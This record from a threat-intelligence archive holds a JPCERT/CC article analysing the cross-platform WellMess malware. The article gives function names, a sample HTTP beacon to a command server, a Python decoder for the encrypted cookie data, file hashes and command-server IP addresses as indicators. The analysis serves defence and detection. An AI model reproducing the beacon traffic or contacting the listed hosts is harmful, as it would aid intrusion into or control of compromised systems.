{
	"id": "aaafede3-2aa8-40ba-87bb-f8262ea21955",
	"created_at": "2026-04-06T00:10:08.338531Z",
	"updated_at": "2026-04-10T13:11:43.364651Z",
	"deleted_at": null,
	"sha1_hash": "2b29b0d7ac9baf17b5cfab0c9e6e16c1592969dc",
	"title": "Malware “WellMess” Targeting Linux and Windows - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 505297,
	"plain_text": "Malware “WellMess” Targeting Linux and Windows -\r\nJPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2018-07-05 · Archived: 2026-04-05 18:16:46 UTC\r\nTool\r\nSome malware is designed to run on multiple platforms, and most commonly they are written in Java. For\r\nexample, Adwind malware (introduced in a past article) is written in Java, and it runs on Windows and other OS.\r\nGolang is another programming language, and it is used for Mirai controller, which infects Linux systems.\r\nThis article introduces the behaviour of WellMess malware based on our observation. It is a type of malware\r\nprogrammed in Golang and cross-compiled to make it compatible both with Linux and Windows. For more details\r\nabout the malware function, please also refer to the report from LAC [1].\r\nBehaviour of WellMess\r\nGenerally, Golang executable files include many required libraries in itself. This usually increases the file size,\r\nmaking WellMess larger than 3 MB. Another feature is that function names for the executable files can be found in\r\nthe file itself. (Even for stripped files, function names can be retrieved by using tools such as GoUtils2.0 [2].)\r\nBelow are the function names used in WellMess:\r\n_/home/ubuntu/GoProject/src/bot/botlib.EncryptText\r\n_/home/ubuntu/GoProject/src/bot/botlib.encrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.Command\r\n_/home/ubuntu/GoProject/src/bot/botlib.reply\r\n_/home/ubuntu/GoProject/src/bot/botlib.Service\r\n_/home/ubuntu/GoProject/src/bot/botlib.saveFile\r\n_/home/ubuntu/GoProject/src/bot/botlib.UDFile\r\n_/home/ubuntu/GoProject/src/bot/botlib.Download\r\n_/home/ubuntu/GoProject/src/bot/botlib.Send\r\n_/home/ubuntu/GoProject/src/bot/botlib.Work\r\n_/home/ubuntu/GoProject/src/bot/botlib.chunksM\r\n_/home/ubuntu/GoProject/src/bot/botlib.Join\r\n_/home/ubuntu/GoProject/src/bot/botlib.wellMess\r\n_/home/ubuntu/GoProject/src/bot/botlib.RandStringBytes\r\n_/home/ubuntu/GoProject/src/bot/botlib.GetRandomBytes\r\n_/home/ubuntu/GoProject/src/bot/botlib.Key\r\n_/home/ubuntu/GoProject/src/bot/botlib.GenerateSymmKey\r\n_/home/ubuntu/GoProject/src/bot/botlib.CalculateMD5Hash\r\n_/home/ubuntu/GoProject/src/bot/botlib.Parse\r\n_/home/ubuntu/GoProject/src/bot/botlib.Pack\r\nhttps://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html\r\nPage 1 of 7\n\n_/home/ubuntu/GoProject/src/bot/botlib.Unpack\r\n_/home/ubuntu/GoProject/src/bot/botlib.UnpackB\r\n_/home/ubuntu/GoProject/src/bot/botlib.FromNormalToBase64\r\n_/home/ubuntu/GoProject/src/bot/botlib.RandInt\r\n_/home/ubuntu/GoProject/src/bot/botlib.Base64ToNormal\r\n_/home/ubuntu/GoProject/src/bot/botlib.KeySizeError.Error\r\n_/home/ubuntu/GoProject/src/bot/botlib.New\r\n_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).BlockSize\r\n_/home/ubuntu/GoProject/src/bot/botlib.convertFromString\r\n_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Encrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Decrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.Split\r\n_/home/ubuntu/GoProject/src/bot/botlib.Cipher\r\n_/home/ubuntu/GoProject/src/bot/botlib.Decipher\r\n_/home/ubuntu/GoProject/src/bot/botlib.Pad\r\n_/home/ubuntu/GoProject/src/bot/botlib.AES_Encrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.AES_Decrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.generateRandomString\r\n_/home/ubuntu/GoProject/src/bot/botlib.deleteFile\r\n_/home/ubuntu/GoProject/src/bot/botlib.Post\r\n_/home/ubuntu/GoProject/src/bot/botlib.SendMessage\r\n_/home/ubuntu/GoProject/src/bot/botlib.ReceiveMessage\r\n_/home/ubuntu/GoProject/src/bot/botlib.Send.func1\r\n_/home/ubuntu/GoProject/src/bot/botlib.init\r\n_/home/ubuntu/GoProject/src/bot/botlib.(*KeySizeError).Error\r\nAs mentioned earlier, WellMess has a version that runs on Windows (PE) and another on Linux (ELF). Although\r\nthere are some minor differences, they both have the same functionality.\r\nThe malware communicates with a C\u0026C server using HTTP requests and performs functions based on the\r\nreceived commands. Below is an example of the communication: (User-Agent value varies per sample.)\r\nPOST / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html, */*\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: c22UekXD=J41lrM+S01+KX29R+As21Sur+%3asRnW+3Eo+nIHjv+o6A7qGw+XQr%3aq+PJ9jaI+KQ7G.+FT2wr+wzQ3vd+3IJXC+lays\r\nHost: 45.123.190.168\r\nContent-Length: 426\r\nExpect: 100-continue\r\nAccept-Encoding: deflate\r\nConnection: Keep-Alive\r\npgY4C8 8JHqk RjrCa R9MS 3vc4Uk KKaRxH R8vg Tfj B3P,C 0RG9lFw DqF405. i3RU1 0lW 2BqdSn K3L Y7hEc. tzto yKU8 p1,E\r\nhttps://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html\r\nPage 2 of 7\n\nResults of command execution are send in HTTP POST request data, which is RSA-encrypted. The data in Cookie\r\nheader is RC6-encrypted. Below is an example of decrypted data. It contains an identifier for infected hosts (the\r\nvalue in between \u003c;head;\u003e tags).\r\n\u003c;head;\u003e6F3C9B16C16074079AFCFF09C6717B0F07864FFE09C1E1DB003B3627D174913B/p\u003c;head;\u003e\u003c;title;\u003ea:1_0\u003c;title;\u003e\u003c;serv\r\nBelow is a part of code that decodes data in the Cookie header. (The script is available on Github.)\r\ndef decode(data, key):\r\n sep = ';'\r\n field = data.split(sep)\r\n i = 1\r\n encdata = \"\"\r\n while i \u003c len(field):\r\n value = field[i].split(\"=\")\r\n encdata += value[1]\r\n I += 1\r\n encdata = urllib.unquote(encdata)\r\n encdata = encdata.replace(\"+\", \" \").replace(\" \", \"=\").replace(\". \", \"\").replace(\" \", \"\").replace(\",\", \"+\")\r\n maindata = base64.b64decode(encdata)\r\n s = generateKey(base64.b64decode(key))\r\n i = 0\r\n decode = \"\"\r\n while i \u003c len(maindata):\r\n orgi = rc6(maindata[i:i + 16], s)\r\n decode += orgi\r\n i += 16\r\n print(\"Decrypted String: %s\" % decode)\r\nThe malware may perform the following functions when receiving commands from a C\u0026C server.\r\nExecute arbitrary shell command\r\nUpload/Download files\r\nIn addition, PE file malware executes PowerShell scripts.\r\nWellmess Developed in .Net Framework\r\nhttps://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html\r\nPage 3 of 7\n\nThere is also a version that was developed in .Net Framework. Figure 1 shows the code that generates data\r\ncontained in the Cookie header upon communicating with a C\u0026C server. It contains the same string as in the\r\nCookie data in the Golang version.\r\nFigure 1: Code to generate data contained in the Cookie\r\nWe have no clue about why the actors have prepared two different versions, however, it seems that they choose a\r\nsample depending on the attack target.\r\nIn closing\r\nWe have confirmed some cases where WellMess infection was found in Japanese organisations. Attacks using the\r\nmalware may continue.\r\nWe have listed some hash values of the samples in Appendix A. Some of the C\u0026C servers that we have confirmed\r\nare also listed in Appendix B. Please make sure that none of your device is accessing such hosts.\r\n- Shusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] LAC: Cyber Emergency Center Report Vol.3 (Japanese)\r\nhttps://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf\r\n[2] GoUtils2.0\r\nhttps://gitlab.com/zaytsevgu/GoUtils2.0/\r\nhttps://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html\r\nPage 4 of 7\n\nAppendix A: SHA-256 Hash value\r\n0b8e6a11adaa3df120ec15846bb966d674724b6b92eae34d63b665e0698e0193 (Golang\u0026ELF)\r\nbec1981e422c1e01c14511d384a33c9bcc66456c1274bbbac073da825a3f537d (Golang\u0026PE)\r\n2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41 (.Net\u0026PE)\r\nAppendix B: C\u0026C server\r\n45.123.190.168\r\n103.13.240.46\r\n101.201.53.27\r\n185.217.92.171\r\n93.113.45.101\r\n191.101.180.78\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially\r\ninvolved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security\r\nmonitoring and analysis operations at a foreign-affiliated IT vendor. He presented at CODE BLUE, BsidesLV,\r\nBlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nRelated articles\r\nUpdate on Attacks by Threat Group APT-C-60\r\nhttps://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html\r\nPage 5 of 7\n\nCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks\r\nMalware Identified in Attacks Exploiting Ivanti Connect Secure Vulnerabilities\r\nDslogdRAT Malware Installed in Ivanti Connect Secure\r\nhttps://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html\r\nPage 6 of 7\n\nTempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup\r\nSource: https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html\r\nhttps://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html"
	],
	"report_names": [
		"malware-wellmes-9b78.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434208,
	"ts_updated_at": 1775826703,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2b29b0d7ac9baf17b5cfab0c9e6e16c1592969dc.pdf",
		"text": "https://archive.orkl.eu/2b29b0d7ac9baf17b5cfab0c9e6e16c1592969dc.txt",
		"img": "https://archive.orkl.eu/2b29b0d7ac9baf17b5cfab0c9e6e16c1592969dc.jpg"
	}
}